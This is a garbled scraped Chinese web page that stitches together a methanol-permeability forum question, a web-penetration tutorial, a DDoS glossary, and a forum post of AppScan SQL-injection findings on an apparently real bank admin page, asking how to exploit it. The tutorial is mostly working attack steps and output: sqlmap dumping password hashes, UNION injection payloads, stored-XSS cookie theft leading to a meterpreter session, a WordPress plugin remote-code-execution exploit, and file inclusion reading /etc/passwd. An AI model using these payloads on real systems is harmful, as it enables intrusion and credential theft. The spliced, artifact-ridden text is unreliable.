求助如何进行土的渗透性性攻击

小木虫 --- 500万硕博科研人员喜爱的学术科研平台
&&查看话题
【求助】膜的甲醇渗透性测试如何做
请教各位网上的电化学大侠,固体电解质膜,来测试甲醇渗透性的测试如何做,用什么来测试甲醇随时间变化的浓度?本来想用的是紫外,但是实验室的紫外装置不能用来测试甲醇。
因为这个涉及我的一个文章能否发表,最终决定我能否按时毕业,万分着急,请各位有识之士帮忙!!!
每一个回复的人我都将会有金币赠送
研究生必备与500万研究生在线互动!
扫描下载送金币
浏览器进程
打开微信扫一扫
随时随地聊科研web渗透攻击技术
1.跨站脚本
反射型:利用邮件给受害者发送个恶意链接,受害者点击时,恶意链接指向的服务器将注入的文件“反射”到受害者的浏览器上,并执行恶意文件。
存储型:利用论坛、博客等web站点,将恶意脚本连同正常信息一起注入帖子内容中,并随帖子一起存储到论坛、博客服务器,当有用户浏览该帖子时,恶意脚本将在浏览器上运行。
DOM型:构造一个URL链接,链接上包含有javascript等脚本,当受害者点击这个URL时,将请求并执行脚本。
2.使用metasploit自带的wmap web扫描器
msf & db_connect -y
/opt/metasploit/config/database.yml
msf & load wmap
.-.-.-..-.-.-..---..---.
| | | || | | || | || |-'
`-----'`-'-'-'`-^-'`-'
[WMAP 1.5.1] === &et [ &]
[*] Successfully loaded plugin: wmap
wmap Commands
=============
& & Command
Description
& & -------
-----------
& & wmap_modules
&Manage wmap modules
& & wmap_nodes
& &Manage nodes
& & wmap_run
& & wmap_sites
& &Manage sites
& & wmap_targets
&Manage targets
& & wmap_vulns
& &Display web vulns
添加目标网站
msf & wmap_sites -a http://10.10.10.129
msf & wmap_sites -l
添加扫描目标&
msf & wmap_targets -t http://10.10.10.129
查看将使用的模块
msf & wmap_run -t
扫描并进行攻击
msf & wmap_run -e
[*] 10.10.10.129 (Apache/2.2.14 (Ubuntu) mod_mono/2.4.3
PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1
Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1) WebDAV disabled.
[*] Module auxiliary/scanner/http/robots_txt
[*] [10.10.10.129] /robots.txt found
服务器的信息和敏感文件都找到了
再通过vulns查看漏洞信息
msf & vulns
00:56:24 UTC Vuln: host=10.10.10.129
name=HTTP Trace Method Allowed
refs=CVE-,CVE-,OSVDB-877,BID-11604,BID-9506,BID-9561&
00:06:40 UTC Vuln: host=10.10.10.130
name=Microsoft Server Service Relative Path Stack Corruption
refs=CVE-,OSVDB-49243,MSB-MS08-067,URL-/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos&
结果还是不错的。
metasploit的渗透模块在module中的文件夹下,主要集中在exploit/unix/webapp
&exploit/windows/http
&exploit/multi/http.
3.开源的web漏洞扫描工具
wapiti 对sql注入的扫描准确度排名第一
w3af 功能强大,配置繁琐
sandcat 对XSS检测效率最好
burp suite web渗透利器 &
4.扫描神器w3af
支持读入配置好的脚本文件,也可以将下面一段直接复制进去
bruteforce
bruteforce formAuthBrute
bruteforce config formAuthBrute
set passwdFile True
set usersFile True
audit xss,sqli
discovery webSpider
discovery config webSpider
set onlyForward True
set target /dvwa/index.php
output htmlFile
output config htmlFile
set verbose True
set fileName aa.html
SQL injection in a MySQL database was found at:
"/dvwa/login.php", using HTTP method POST. The
sent post-data was:
"username=d'z"0&Login=Login&password=FrAmE30.". The
modified parameter was "username". This vulnerability was found in
the request with id 311.
URL : /dvwa/login.php
Severity : High
值得一提的是:w3af还有很多小工具保存在tools目录下,如base64decode,md5hash等。
5.SQL注入漏洞的探测
登陆语句一般为select * from * where user='**' and pass='**'
改成这样就直接绕过了
select * from * where user='admin' or '1=1'and pass='**'
即输入admin' or '1=1
里面有个专门用来学习sql注入的网页,我们试试sqlmap
root@bt:~# cd /pentest/database/sqlmap
在使用之前我们需要知道referer 和cookie的值
可以使用火狐的tamperdata,我的火狐版本较高,这个不兼容,这里使用的是wireshark
root@bt:/pentest/database/sqlmap# ./sqlmap.py
-u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#'
--cookie='security= PHPSESSID=qjqe7ht1bi9davum40hufaau45'
[10:29:07] [INFO] GET parameter 'id' is 'MySQL &= 5.0 AND
error-based - WHERE or HAVING clause'
injectable&
[10:29:07] [INFO] GET parameter 'id' is 'MySQL UNION query
(NULL) - 1 to 20 columns' injectable
[10:29:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
获得信息较详细了
获取数据库名
./sqlmap.py
-u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#'
--cookie='security= PHPSESSID=qjqe7ht1bi9davum40hufaau45' --dbs
[10:38:55] [WARNING] reflective value(s) found and filtering
available databases [2]:
[*] information_schema &mysql默认的
./sqlmap.py
-u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#'
--cookie='security= PHPSESSID=qjqe7ht1bi9davum40hufaau45' -D
dvwa --tables
[10:41:17] [WARNING] reflective value(s) found and filtering
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users & & |
+-----------+
root@bt:/pentest/database/sqlmap# ./sqlmap.py
-u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#'
--cookie='security= PHPSESSID=qjqe7ht1bi9davum40hufaau45' -D
dvwa --tables -T users --columns
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column & & | Type
+------------+-------------+
| avatar & & | varchar(70)
| first_name | varchar(15) |
| last_name &| varchar(15) |
| password & | varchar(32) |
| user & &
& | varchar(15) |
| user_id & &| int(6)
+------------+-------------+
导出password列的内容
./sqlmap.py
-u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#'
--cookie='security= PHPSESSID=qjqe7ht1bi9davum40hufaau45' -D
dvwa --tables -T users --columns --dump
recognized possible password hashes in column 'password'. Do
you want to crack them via a dictionary-based attack? [Y/n/q]
Database: dvwa
Table: users
[5 entries]
+---------+---------+-------------------------------------------------+----------------------------------+-----------+------------+
| user_id | user & &| avatar
& & &| password
last_name | first_name |
+---------+---------+-------------------------------------------------+----------------------------------+-----------+------------+
| 1 & & & |
http://owaspbwa/dvwa/hackable/users/admin.jpg & |
a5ae4a801fc3 | admin &
& | admin & &
| 2 & & & |
gordonb | http://owaspbwa/dvwa/hackable/users/gordonb.jpg |
e99a18c428cb38d5f260853678922e03 | Brown &
& | Gordon & &
| 3 & & & |
http://owaspbwa/dvwa/hackable/users/1337.jpg &
&| 8dcd4fcc69216b | Me
&| Hack & &
| 4 & & & |
http://owaspbwa/dvwa/hackable/users/pablo.jpg & |
0d107d09f5bbe40cade3de5c71e9e9b7 | Picasso & |
| 5 & & & |
http://owaspbwa/dvwa/hackable/users/smithy.jpg &|
5f4dcc3b5aa765d61d8327deb882cf99 | Smith &
& | Bob & &
+---------+---------+-------------------------------------------------+----------------------------------+-----------+------------+
剩下的就是破解MD5值了
值得一提的是,sqlmap 还支持通过数据库注入一个交互的shell
root@bt:/pentest/database/sqlmap# ./sqlmap.py -h | grep
& & --os-shell
& &Prompt for an interactive
operating system shell
& & --os-pwn
& & &Prompt for
an out-of-band shell, meterpreter or VNC
--os-shell 提供四种不同的shell(ASP,ASPX,PHP,JSP)
我们再试试手工注入
First name: admin
Surname: admin
说明这是个查询 语句类似于: select firstname,surname from table where
输入' or '1'='1'#
看到所有的结果
输入1' order by 3# &出错
说明表里面只有两列
mysql有个默认的数据库information_schema,里面有个叫tables的表,里面保存了整个Mysql所有库、表的信息
table_schema和table_name是其中表示库名和表名的两列
' union select 1,table_name from
information_schema.tables#
这样我们就得到了除系统自带表以外的表了,这里最后两个是用户自己添加的
ID: ID: ' union select table_schema,table_name from
information_schema.tables#
First name: dvwa
Surname: guestbook
ID: ID: ' union select table_schema,table_name from
information_schema.tables#
First name: dvwa
Surname: users
很轻松的得到了库名和表名,我们关心的是users表
mysql默认的数据库information_schema有张表还保存了每张表的列名,表名为columns
意味着我们还能查询到users表的所有列名
' union select 1,column_name from information_schema.columns
where table_name='users'#
ID: ' union select 1,column_name from
information_schema.columns where table_name='users'#
First name: 1
Surname: user_id
ID: ' union select 1,column_name from
information_schema.columns where table_name='users'#
First name: 1
Surname: first_name
ID: ' union select 1,column_name from
information_schema.columns where table_name='users'#
First name: 1
Surname: last_name
ID: ' union select 1,column_name from
information_schema.columns where table_name='users'#
First name: 1
Surname: user
ID: ' union select 1,column_name from
information_schema.columns where table_name='users'#
First name: 1
Surname: password
ID: ' union select 1,column_name from
information_schema.columns where table_name='users'#
First name: 1
Surname: avatar
那么就剩下获取字段的内容了
' union select user,password from dvwa.users#
ID: ' union select user,password from dvwa.users#
First name: admin
Surname: a5ae4a801fc3
ID: ' union select user,password from dvwa.users#
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03
ID: ' union select user,password from dvwa.users#
First name: 1337
Surname: 8dcd4fcc69216b
ID: ' union select user,password from dvwa.users#
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' union select user,password from dvwa.users#
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
ID: ' union select user,password from dvwa.users#
First name: user
Surname: ee11cbbaac0ca060c23ee
大功告成!
6.XSS漏洞探测
discovery webSpider
discovery config webSpider
set onlyForward True
set target
/mutillidae/?page=add-to-your-blog.php
output htmlFile
output config htmlFile
set verbose True
set fileName mutillidae.html
Cross Site Scripting was found at:
"/mutillidae/index.php?page=add-to-your-blog.php",
using HTTP method POST. The sent post-data was:
"input_from_form=
URL : /mutillidae/index.php
Severity : Medium
7.web应用程序漏洞探测
wXf是一个web应用漏洞扫描和攻击工具
/WebExploitationFramework/wxf
BT5的Ruby版本有点低,在kali上能很好的运行
这里面支持一个wordpress的扫描模块
8.XSS跨站攻击
javascript能够很好的增加网页的丰富多样性,因而使用还是比较广泛的。
想成功执行一个XSS,需要两个步骤:
1.攻击者发送的数据没有被过滤或是删除。
2.web应用返回的数据没有经过编码。
对于一个安全的web应用来说,返回页面的每一个特殊字符包括& && &
、 /都应该经过编码,最好是进行16进制编码。
针对/dvwa/vulnerabilities/xss_r这个网站
当我们输入直接弹框XSS
很明显的一个反射式跨站漏洞。
而存储型的跨站攻击并不需要直接对网站的某个输入点进行输入,而是长期存储在web应用中并作为一个内容。
对于存储型的/dvwa/vulnerabilities/xss_s/
在发表文章的撰写文章并提交,在输入框中输入而这个js里面就包括了获取session和cookie的代码。
当别人访问你的文章时,信息就被窃取了。
9.跨站脚本攻击框架XSSF
/p/xssf/downloads/list下载
把里面的四个文件夹data,lib,modules和plugin合并到/opt/framework/msf3里面的文件夹
msf & load xssf
msf & xssf_urls
[+] XSSF Server : 'http://192.168.0.4:8888/' or
'http://:8888/'
[+] Generic XSS injection: 'http://192.168.0.4:8888/loop' or
'http://:8888/loop'
[+] XSSF test page : 'http://192.168.0.4:8888/test.html' or
'http://:8888/test.html'
以上就是我们的攻击配置文件
当我们把链接 http://192.168.0.4:8888
通过存储式跨站加入到博客里面,当第三方浏览这个博客同时点击这个链接时,就能看到点击者的信息。
查看被攻击者的信息
msf & xssf_victims
查看具体主机
msf & xssf_information 4
如果是低版本的IE浏览器
我们可以使用相关的攻击模块
msf & use auxiliary/server/browser_autopwn
接着是使用metasploit的反弹回连模块
msf &xssf_exploit 2 14
最后得到一个meterpreter
10.命令注入攻击
wordpress zingiri plugin渗透代码,是一个php脚本
当然前提是wordpress装有这个插件,并且还存在漏洞。
root@bt:~/Desktop# php exp.php 10.10.10.129 /wordpress/
+----------------------------------------------------------------------------------+
| Wordpress Zingiri Web Shop Plugin &= 2.2.3 Remote Code
Execution Exploit by EgiX |
+----------------------------------------------------------------------------------+
zingiri-shell#&
zingiri-shell# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
得到了一个shell,但是这个shell和www-data这个账号的权限是相同的,还不够高
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
11.文件包含和文件上传漏洞
针对文件包含漏洞的页面,也许改个参数你就能知道很多信息
http://192.168.0.3/dvwa/vulnerabilities/fi/?page=include.php
http://192.168.0.3/dvwa/vulnerabilities/fi/?page=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing
List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats
Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x::nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false mysql:x:103:105:MySQL
Server,,,:/var/lib/mysql:/bin/false
landscape:x:104:122::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:106:109:PostgreSQL
administrator,,,:/var/lib/postgresql:/bin/bash
messagebus:x:107:114::/var/run/dbus:/bin/false
tomcat6:x:108:115::/usr/share/tomcat6:/bin/false
user:x::user,,,:/home/user:/bin/bash
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
haldaemon:x:110:119:Hardware abstraction
layer,,,:/var/run/hald:/bin/false pulse:x:111:120:PulseAudio
daemon,,,:/var/run/pulse:/bin/false
postfix:x:112:123::/var/spool/postfix:/bin/false&
这就有了很多信息了。
对于文件长传漏洞,上传特制的带有webshell的文件,然后将page=提成远程主机上webshell的url,这样就有了webshell,可以执行shell命令了。
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。&&国之画&&&& &&&&&&
&& &&&&&&&&&&&&&&
鲁ICP备号-4
打开技术之扣,分享程序人生!DDOS攻击相关名词解释
DDOS攻击相关名词解释
DDOS攻击相关名词解释
作者:冰盾防火墙 网站: 日期:
什么是僵尸网络?僵尸网络是指采用一种或多种传播手段,将大量主机感染bot程序(僵尸程序)病毒,从而在控制者和被感染主机之间所形成的一个可一对多控制的网络。攻击者 通过各种途径传播僵尸程序感染互联网上的大量主机,而被感染的主机将通过一个控制信道接收攻击者的指令,组成一个僵尸网络。&什么是渗透攻击?网络渗透攻击是攻击者常用的一种攻击手段,也是一种综合的高级攻击技术,同时网络渗透也是安全工作者所研究的一个课题,在他们口中通常被称为&渗透测试(PenetrationTest)&。为了保障网络的安全,网络管理员往往会严格地规划网络的结构,区分内部与外部网络进行网络隔离,设置网络防火墙,安装杀毒软件,并做好各种安全保护措施。然而绝对的安全是不存在的,潜在的危险和漏洞总是相对存在的。网络渗透攻击&是对大型的网络主机服务器群组采用的一种迂回渐进式的攻击方法,通过长期而有计划地逐步渗透攻击进入网络,最终完全控制整个网络。&网络渗透攻击&之所以能够成功,是因为网络上总会有一些或大或小的安全缺陷或漏洞。攻击者利用这些小缺口一步一步地 将这些缺口扩大、扩大、再扩大,最终导致整个防线的失守,并掌控整个网络的权限。因此,作为网络管理员,完全有必要了解甚至掌握网络渗透入侵的技 术,这样才能针对性地进行防御,从而保障网络的真正安全。&渗透攻击与普通攻击有什么不同?网络渗透攻击与普通网络攻击的不同在于,普通的网络攻击只是单一类型的攻击。 例如,在普通的网络攻击事件中,攻击者可能仅仅是利用目标网络的Web服务器漏洞,入侵网站更改网页,或者在网页上挂马。也就是说,这种攻击是随机的,而 其目的也是单一而简单的。 网络渗透攻击则与此不同,它是一种系统渐进型的综合攻击方式,其攻击目标是明确的,攻击目的往往不那么单一,危害性也非常严重。 例如,攻击者会有针对性地对某个目标网络进行攻击,以获取其内部的商业资料,进行网络破坏等。因此,攻击者实施攻击的步骤是非常系统的,假设其获取了目标 网络中网站服务器的权限,则不会仅满足于控制此台服务器,而是会利用此台服务器,继续入侵目标网络,获取整个网络中所有主机的权限。为了实现渗透攻击,攻 击者采用的攻击方式绝不仅此于一种简单的Web脚本漏洞攻击。攻击者会综合运用远程溢出、木马攻击、密码破解、嗅探、ARP欺骗等多种攻击方式,逐步控制 网络。总体来说,与普通网络攻击相比,网络渗透攻击具有几个特性:攻击目的的明确性,攻击步骤的逐步与渐进性,攻击手段的多样性和综合性。&什么是?DDOS又称为分布式拒绝服务,全称是Distributed Denial of Service。原理: 通过使网络过载来干扰甚至阻断正常的网络通讯。通过向服务器提交大量请求,使服务器超负荷。阻断某一用户访问服务器阻断某服务与特定系统或个人的通讯。常 见的有SYN flood、UDP flood、ICMP flood等。其中SYN flood是最常见的一种,其原理是TCP协议设计中得缺陷(3次握手)。在SYN flood攻击时,首先伪造大量的源IP地址,分别向服务器发送的大量的SYN包,服务器会返回ACK/SYN包,但是IP是伪造的,所以服务器是不会受 到应答的,会重试3-5次,并且等待一个SYN time(一般是39秒到2分钟),如果超时则丢弃这个连接。攻击者发送大量的这种伪造源地址的SYN请求,服务端会消耗很多的资源(CPU和内存)来处 理这种半连接,同时还要对这些请求进行SYN/ACK重试,最后的结果就是服务器无暇理睬正常的连接请求,导致拒绝服务。&什么是CC攻击?CC攻击的前身是一个叫fatboy的攻击程序,当时是黑客为了挑战绿盟的一款防DDOS设备开发的。 CC应该算是一个应用层的DDOS,是发生在TCP3次握手已经完成之后,,所以发送的IP都是真实的,但应用层的DDOS又是甚至比网络层的DDOS更 可怕,因为今天几乎所有的商业anti-DDOS设备,只在对抗网络层DDOS时效果较好,而对应用层却缺乏有效的手段。CC攻击的原理很简 单,就是对一些消耗资源交单的应用页面不断地发起正常的请求,以达到消耗服务端资源的目的,在web应用中,查询数据库、读写硬盘文件的操作,相对都会消 耗比较多的资源。一个简单的例子,一个小的网站,可能被搜索引擎、信息收集等系统的爬虫爬死,或者是扫描器扫死,这与应用层的的结果很像。
最新内容:
相关内容:
合作伙伴:查看:2816|回复:3
有漏洞的URL:
以下更改已应用到原始请求:
o 已将路径设置为“/~root/”
请求/响应:
GET /~root/ HTTP/1.0
Cookie: JSESSIONID=0000WVEgcm19K-8PFz3_M--4P5P:-1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 ( MSIE 6.0; Win32)
HTTP/1.1 403 Forbidden
Content-Length: 430
Date: Sat, 26 Jun :11 GMT
Server: IBM_HTTP_Server/6.0.1 Apache/2.0.47 (Unix)
Keep-Alive: timeout=10, max=2000
Xonnection: Xeep-Alive
Content-Type: text/ charset=iso-8859-1
&!DOCTYPE HTML PUBLIC &-//IETF//DTD HTML 2.0//EN&&
&html&&head&
&title&403 Forbidden&/title&
&/head&&body&
&h1&Forbidden&/h1&
&p&You don't have permission to access /~root/
on this server.&/p&
&p&Additionally, a 403 Forbidden
error was encountered while trying to use an ErrorDocument to handle the
request.&/p&
&address&IBM_HTTP_Server/6.0.1 Apache/2.0.47 (Unix) Server at
80&/address&
&/body&&/html&
响应中的验证:
o HTTP/1.1 403 Forbidden
响应中的验证:
o HTTP/1.1 403 Forbidden
测试尝试了检测服务器上的隐藏目录。403 Forbidden 响应泄露了存在此目录,即使不允
许对其进行访问。
[8 / 12] SQL 盲注
严重性: 高
测试类型: 应用程序
有漏洞的URL:
(参数 = submit1)
修复任务: 过滤掉用户输入中的危险字符
1 的变体 1 [ID=17667]
以下更改已应用到原始请求:
o 已将参数“submit1”的值设置为“%27+%2B+%27%27+%2B+%27%E6%8F%90%E4%BA%A4”
请求/响应:
POST /bhbank/admin/main?transName=saveReporterInfo HTTP/1.0
Cookie: JSESSIONID=0000xDwE_zAUiZNX_TWsogX6O9D:-1
Content-Length: 198
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 ( MSIE 6.0; Win32)
Content-Type: application/x-www-form-urlencoded
corporation=1234&name=&telephone=555-555-5555&mobile=1234&email=abc123%40acmehackme.
com&address=753+Main+Street&introduction=1234&submit1=%27+%2B+%27%27+%2B+%27%
E6%8F%90%E4%BA%A4&sex=%E7%94%841%A47
HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=0000QIHg2zYmEqAw_LYigEMF27z:-1; path=/
Content-Length: 653
Date: Sun, 28 Nov :27 GMT
Server: IBM_HTTP_Server/6.0.1 Apache/2.0.47 (Unix)
Last-Modified: Thu, 16 Aug :14 GMT
Keep-Alive: timeout=10, max=2000
Xonnection: Xeep-Alive
Content-Type: text/html
Content-Language: zh-CN
&script language=&javascript& type=&text/javascript&
src=&/bhbank/bloveoct.js&&&/script&
&SCRIPT LANGUAGE=&JavaScript&&
// parent.tt();
var ifr=parent.document.getElementById(&iframe1&);
ifr.height=200;
&title&xxxx-错误提示页面&/title&
&style type=&text/css&&
margin-left: 0
margin-top: 0
margin-right: 0
margin-bottom: 0
&style type=&text/css&&
color: #4EA0FC;
font-weight:
&body style=&background:#F7F7F7;& &
&span class=&STYLE1&&您的信息已提交,感谢您对xxxx的关注与支持! &/span&
POST /bhbank/admin/main?transName=saveReporterInfo HTTP/1.0
Cookie: JSESSIONID=0000xDwE_zAUiZNX_TWsogX6O9D:-1
Content-Length: 195
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 ( MSIE 6.0; Win32)
Content-Type: application/x-www-form-urlencoded
corporation=1234&name=&telephone=555-555-5555&mobile=1234&email=abc123%40acmehackme.
com&address=753+Main+Street&introduction=1234&submit1=%27+%2B+%27+%2B+%27%E6%
8F%90%E4%BA%A4&sex=%E7%94%841%A47
HTTP/1.1 404 Not Found
&HTML&&HEAD&&title&JSP ????&/title&&style type=&text/css&&#mybox{padding:
0.5border: border-width: width: 100%;}&/style&&style
type=&text/css&&h2 { text-align:color:#5555FF;font-size:15font-family:
Verdana, Helvitica, sans-font-weight:bold}&/style&&/HEAD&&BODY&&h2&JSP ????
&/h2&&TABLE BORDER=2 BGCOLOR=&#DDDDFF&&&TR VALIGN=&BOTTOM&&&TD BGCOLOR=&#C2B0D6&
&&B&&FONT FACE=&Verdana, Helvitica, sans-serif& COLOR=&black& SIZE=&4PT&&HTTP ?????
&&&404&/B&&BR&&BR&&/TD&&/TR&&TR&&TD&&B&?????&/B&&div
id=&mybox&&&PRE&JSPG0036E: ?????? /admin/error.jsp&BR&&/PRE&&/div&&/TD&&/TR&&TR&&TD&
&B&?????&/B&&div id=&mybox&&&PRE&java.io.FileNotFoundException:
JSPG0036E: ?????? /admin/error.jsp&BR& at
com.ibm.ws.jsp.webcontainerext.JSPExtensionProcessor.findWrapper
(JSPExtensionProcessor.java(Compiled Code))&BR& at
com.ibm.ws.jsp.webcontainerext.JSPExtensionProcessor.handleRequest
(JSPExtensionProcessor.java(Compiled Code))&BR& at
com.ibm.ws.webcontainer.webapp.WebAppRequestDispatcher.forward
(WebAppRequestDispatcher.java(Compiled Code))&BR& at
com.csii.ebank.core.MainServlet.doPost(MainServlet.java(Compiled Code))&BR& at
javax.servlet.http.HttpServlet.service(HttpServlet.java(Compiled Code))&BR& at
javax.servlet.http.HttpServlet.service(HttpServlet.java(Compiled Code))&BR& at
com.ibm.ws.webcontainer.servlet.ServletWrapper.service(ServletWrapper.java(Compiled
Code))&BR& at com.ibm.ws.webcontainer.servlet.ServletWrapper.handleRequest
(ServletWrapper.java(Compiled Code))&BR& at
com.ibm.ws.webcontainer.servlet.CacheServletWrapper.handleRequest
(CacheServletWrapper.java(Compiled Code))&BR& at
com.ibm.ws.webcontainer.WebContainer.handleRequest(WebContainer.java(Compiled Code))
&BR& at com.ibm.ws.webcontainer.channel.WCChannelLink.ready(WCChannelLink.java
(Compiled Code))&BR& at
com.ibm.ws.http.channel.inbound.impl.HttpInboundLink.handleDiscrimination
(HttpInboundLink.java(Compiled Code))&BR& at
com.ibm.ws.http.channel.inbound.impl.HttpInboundLink.handleNewInformation
(HttpInboundLink.java(Compiled Code))&BR& at
com.ibm.ws.http.channel.inbound.plete
(HttpICLReadCallback.java(Compiled Code))&BR& at
com.ibm.ws.tcp.channel.impl.WorkQueueManager.requestComplete(WorkQueueManager.java
(Compiled Code))&BR& at com.ibm.ws.tcp.channel.impl.WorkQueueManager.attemptIO
(WorkQueueManager.java(Compiled Code))&BR& at
com.ibm.ws.tcp.channel.impl.WorkQueueManager.workerRun(WorkQueueManager.java
(Compiled Code))&BR& at com.ibm.ws.tcp.channel.impl.WorkQueueManager$Worker.run
(WorkQueueManager.java(Compiled Code))&BR& at com.ibm.ws.util.Th...
此测试会将条件选项附加到参数值后面,以验证其是否嵌入到后端的SQL 查询中。已发
送三(或四)个测试请求:最后一个在逻辑上等同于原始请求,并且倒数第二个请求是不
同的(其他请求用于控制用途)。最后两个测试响应与原始测试响应的比较可确认附加的
值确实已添加到了SQL 查询中。
以上是appscan扫描结果,请问如何进行sql注入,
渗透性攻击的步骤和流程是什么
LZ 是来宣传的吧
非也,有懂的吗
初级工程师
不懂啊~!!!!!!!!!!!:(pdd_24):}

我要回帖

更多关于 渗透性中耳炎 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信